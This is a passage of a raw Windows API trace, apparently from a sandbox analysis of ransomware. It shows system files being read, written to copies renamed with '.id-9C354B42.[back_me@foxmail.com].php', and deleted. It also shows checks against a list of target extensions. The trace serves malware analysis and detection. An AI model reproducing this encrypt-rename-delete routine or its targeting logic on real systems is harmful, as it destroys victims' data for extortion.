(lpString="MTEXTRA.TTF") returned 11 [0053.616] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.617] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=7656) returned 1 [0053.617] CloseHandle (hObject=0x1b4) returned 1 [0053.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 0x20 [0053.617] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.617] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.617] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.618] GetLastError () returned 0x0 [0053.618] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x1de8, lpOverlapped=0x0) returned 1 [0053.629] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x1df0, lpOverlapped=0x0) returned 1 [0053.630] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.630] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0053.630] SetEndOfFile (hFile=0x1a8) returned 1 [0053.630] CloseHandle (hObject=0x1a8) returned 1 [0053.630] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.630] SetEndOfFile (hFile=0x1b4) returned 1 [0053.631] CloseHandle (hObject=0x1b4) returned 1 [0053.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.631] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.632] lstrlenW (lpString=".doc") returned 4 [0053.632] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0053.632] lstrlenW (lpString=".docx") returned 5 [0053.632] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0053.632] lstrlenW (lpString=".pdf") returned 4 [0053.632] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0053.632] lstrlenW (lpString=".xls") returned 4 [0053.632] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0053.632] lstrlenW (lpString=".xlsx") returned 5 [0053.632] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0053.632] lstrlenW (lpString=".ppt") returned 4 [0053.632] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.632] lstrlenW (lpString=".zip") returned 4 [0053.632] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0053.632] lstrlenW (lpString=".rar") returned 4 [0053.632] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0053.632] lstrlenW (lpString=".bz2") returned 4 [0053.632] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0053.632] lstrlenW (lpString=".7z") returned 3 [0053.632] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.632] lstrlenW (lpString=".dbf") returned 4 [0053.632] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.632] lstrlenW (lpString=".1cd") returned 4 [0053.632] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0053.632] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.632] lstrlenW (lpString=".jpg") returned 4 [0053.633] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0053.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.633] lstrlenW (lpString=".doc") returned 4 [0053.633] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0053.633] lstrlenW (lpString=".docx") returned 5 [0053.633] lstrcmpiW (lpString1=".docx", lpString2="A.TTF") returned -1 [0053.633] lstrlenW (lpString=".pdf") returned 4 [0053.633] lstrcmpiW (lpString1=".pdf", lpString2=".TTF") returned -1 [0053.633] lstrlenW (lpString=".xls") returned 4 [0053.633] lstrcmpiW (lpString1=".xls", lpString2=".TTF") returned 1 [0053.633] lstrlenW (lpString=".xlsx") returned 5 [0053.633] lstrcmpiW (lpString1=".xlsx", lpString2="A.TTF") returned -1 [0053.633] lstrlenW (lpString=".ppt") returned 4 [0053.633] lstrcmpiW (lpString1=".ppt", lpString2=".TTF") returned -1 [0053.633] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.633] lstrlenW (lpString=".zip") returned 4 [0053.633] lstrcmpiW (lpString1=".zip", lpString2=".TTF") returned 1 [0053.633] lstrlenW (lpString=".rar") returned 4 [0053.634] lstrcmpiW (lpString1=".rar", lpString2=".TTF") returned -1 [0053.634] lstrlenW (lpString=".bz2") returned 4 [0053.634] lstrcmpiW (lpString1=".bz2", lpString2=".TTF") returned -1 [0053.634] lstrlenW (lpString=".7z") returned 3 [0053.634] lstrcmpiW (lpString1=".7z", lpString2="TTF") returned -1 [0053.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.635] lstrlenW (lpString=".dbf") returned 4 [0053.635] lstrcmpiW (lpString1=".dbf", lpString2=".TTF") returned -1 [0053.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.635] lstrlenW (lpString=".1cd") returned 4 [0053.635] lstrcmpiW (lpString1=".1cd", lpString2=".TTF") returned -1 [0053.635] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0053.635] lstrlenW (lpString=".jpg") returned 4 [0053.635] lstrcmpiW (lpString1=".jpg", lpString2=".TTF") returned -1 [0053.635] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0053.635] lstrlenW (lpString="MSOEURO.DLL") returned 11 [0053.635] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.636] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=31104) returned 1 [0053.636] CloseHandle (hObject=0x1b4) returned 1 [0053.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 0x20 [0053.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.636] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.636] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.636] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.637] GetLastError () returned 0x0 [0053.637] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x7980, lpOverlapped=0x0) returned 1 [0053.640] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x7990, lpOverlapped=0x0) returned 1 [0053.641] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.641] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0053.641] SetEndOfFile (hFile=0x1a8) returned 1 [0053.641] CloseHandle (hObject=0x1a8) returned 1 [0053.641] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.641] SetEndOfFile (hFile=0x1b4) returned 1 [0053.642] CloseHandle (hObject=0x1b4) returned 1 [0053.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.643] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 1 [0053.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.643] lstrlenW (lpString=".doc") returned 4 [0053.643] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.643] lstrlenW (lpString=".docx") returned 5 [0053.643] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0053.643] lstrlenW (lpString=".pdf") returned 4 [0053.643] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.643] lstrlenW (lpString=".xls") returned 4 [0053.643] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.643] lstrlenW (lpString=".xlsx") returned 5 [0053.643] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0053.643] lstrlenW (lpString=".ppt") returned 4 [0053.643] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.643] lstrlenW (lpString=".zip") returned 4 [0053.643] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.643] lstrlenW (lpString=".rar") returned 4 [0053.643] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.643] lstrlenW (lpString=".bz2") returned 4 [0053.643] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.643] lstrlenW (lpString=".7z") returned 3 [0053.643] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.644] lstrlenW (lpString=".dbf") returned 4 [0053.644] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.644] lstrlenW (lpString=".1cd") returned 4 [0053.644] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.644] lstrlenW (lpString=".jpg") returned 4 [0053.644] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.644] lstrlenW (lpString=".doc") returned 4 [0053.644] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.644] lstrlenW (lpString=".docx") returned 5 [0053.644] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0053.644] lstrlenW (lpString=".pdf") returned 4 [0053.644] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.644] lstrlenW (lpString=".xls") returned 4 [0053.644] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.644] lstrlenW (lpString=".xlsx") returned 5 [0053.644] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0053.644] lstrlenW (lpString=".ppt") returned 4 [0053.644] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.644] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.644] lstrlenW (lpString=".zip") returned 4 [0053.644] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.644] lstrlenW (lpString=".rar") returned 4 [0053.644] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.644] lstrlenW (lpString=".bz2") returned 4 [0053.644] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.644] lstrlenW (lpString=".7z") returned 3 [0053.644] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.645] lstrlenW (lpString=".dbf") returned 4 [0053.645] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.645] lstrlenW (lpString=".1cd") returned 4 [0053.645] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0053.645] lstrlenW (lpString=".jpg") returned 4 [0053.645] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.645] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0053.645] lstrlenW (lpString="msgfilt.dll") returned 11 [0053.645] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0054.514] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=38768) returned 1 [0054.514] CloseHandle (hObject=0x1b4) returned 1 [0054.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 0x20 [0054.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0054.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0054.515] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.515] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.515] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0055.070] GetLastError () returned 0x0 [0055.070] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x9770, lpOverlapped=0x0) returned 1 [0055.073] WriteFile (in: hFile=0x164, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x9780, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x9780, lpOverlapped=0x0) returned 1 [0055.074] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.074] WriteFile (in: hFile=0x164, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0055.074] SetEndOfFile (hFile=0x164) returned 1 [0055.075] CloseHandle (hObject=0x164) returned 1 [0055.075] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.075] SetEndOfFile (hFile=0x1b4) returned 1 [0055.076] CloseHandle (hObject=0x1b4) returned 1 [0055.076] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0055.076] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll")) returned 1 [0055.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.076] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.076] lstrlenW (lpString=".doc") returned 4 [0055.077] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.077] lstrlenW (lpString=".docx") returned 5 [0055.077] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0055.077] lstrlenW (lpString=".pdf") returned 4 [0055.077] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.077] lstrlenW (lpString=".xls") returned 4 [0055.077] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.077] lstrlenW (lpString=".xlsx") returned 5 [0055.077] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0055.077] lstrlenW (lpString=".ppt") returned 4 [0055.077] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.077] lstrlenW (lpString=".zip") returned 4 [0055.077] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.077] lstrlenW (lpString=".rar") returned 4 [0055.077] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.077] lstrlenW (lpString=".bz2") returned 4 [0055.077] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.077] lstrlenW (lpString=".7z") returned 3 [0055.077] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.077] lstrlenW (lpString=".dbf") returned 4 [0055.077] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.077] lstrlenW (lpString=".1cd") returned 4 [0055.077] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.077] lstrlenW (lpString=".jpg") returned 4 [0055.077] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.078] lstrlenW (lpString=".doc") returned 4 [0055.078] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.078] lstrlenW (lpString=".docx") returned 5 [0055.078] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0055.078] lstrlenW (lpString=".pdf") returned 4 [0055.078] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.078] lstrlenW (lpString=".xls") returned 4 [0055.078] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.078] lstrlenW (lpString=".xlsx") returned 5 [0055.078] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0055.078] lstrlenW (lpString=".ppt") returned 4 [0055.078] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.078] lstrlenW (lpString=".zip") returned 4 [0055.078] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.078] lstrlenW (lpString=".rar") returned 4 [0055.078] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.078] lstrlenW (lpString=".bz2") returned 4 [0055.078] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.078] lstrlenW (lpString=".7z") returned 3 [0055.078] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.078] lstrlenW (lpString=".dbf") returned 4 [0055.078] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.078] lstrlenW (lpString=".1cd") returned 4 [0055.078] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66 [0055.078] lstrlenW (lpString=".jpg") returned 4 [0055.078] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.079] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0055.079] lstrlenW (lpString="offfiltx.dll") returned 12 [0055.079] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0055.080] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=1486736) returned 1 [0055.080] CloseHandle (hObject=0x1b4) returned 1 [0055.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 0x20 [0055.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft 